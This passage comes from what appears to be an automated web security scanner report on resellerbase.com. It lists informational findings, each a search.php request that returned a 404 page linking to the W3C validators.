<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.127. http://www.resellerbase.com/detail/16/themes/kosmos/images/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/16/themes/kosmos/images/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/16/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/16/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/16/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.128. http://www.resellerbase.com/detail/16/themes/kosmos/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/16/themes/kosmos/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/16/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/16/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/16/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.129. http://www.resellerbase.com/detail/16/themes/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/16/themes/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/16/themes/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/16/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/16/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.130. http://www.resellerbase.com/detail/17/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/17/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/17/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/17/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/17/resellerclub-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.131. http://www.resellerbase.com/detail/17/themes/kosmos/images/rating/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/17/themes/kosmos/images/rating/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/17/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/17/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/17/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.132. http://www.resellerbase.com/detail/17/themes/kosmos/images/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/17/themes/kosmos/images/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/17/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/17/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/17/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.133. http://www.resellerbase.com/detail/17/themes/kosmos/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/17/themes/kosmos/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/17/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/17/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/17/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.134. http://www.resellerbase.com/detail/17/themes/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/17/themes/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/17/themes/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/17/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/17/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.135. http://www.resellerbase.com/detail/18/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/18/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/18/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/18/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/18/worlddatingpartners-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.136. http://www.resellerbase.com/detail/18/themes/kosmos/images/rating/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/18/themes/kosmos/images/rating/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/18/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/18/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/18/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.137. http://www.resellerbase.com/detail/18/themes/kosmos/images/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/18/themes/kosmos/images/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/18/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/18/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/18/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.138. http://www.resellerbase.com/detail/18/themes/kosmos/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/18/themes/kosmos/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/18/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/18/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/18/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.139. http://www.resellerbase.com/detail/18/themes/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/18/themes/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/18/themes/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/18/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/18/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.140. http://www.resellerbase.com/detail/19/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/19/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/19/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/19/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/19/dating-central-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.141. http://www.resellerbase.com/detail/19/themes/kosmos/images/rating/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/19/themes/kosmos/images/rating/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/19/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/19/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/19/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.142. http://www.resellerbase.com/detail/19/themes/kosmos/images/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/19/themes/kosmos/images/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/19/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/19/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/19/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.143. http://www.resellerbase.com/detail/19/themes/kosmos/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/19/themes/kosmos/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/19/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/19/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/19/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
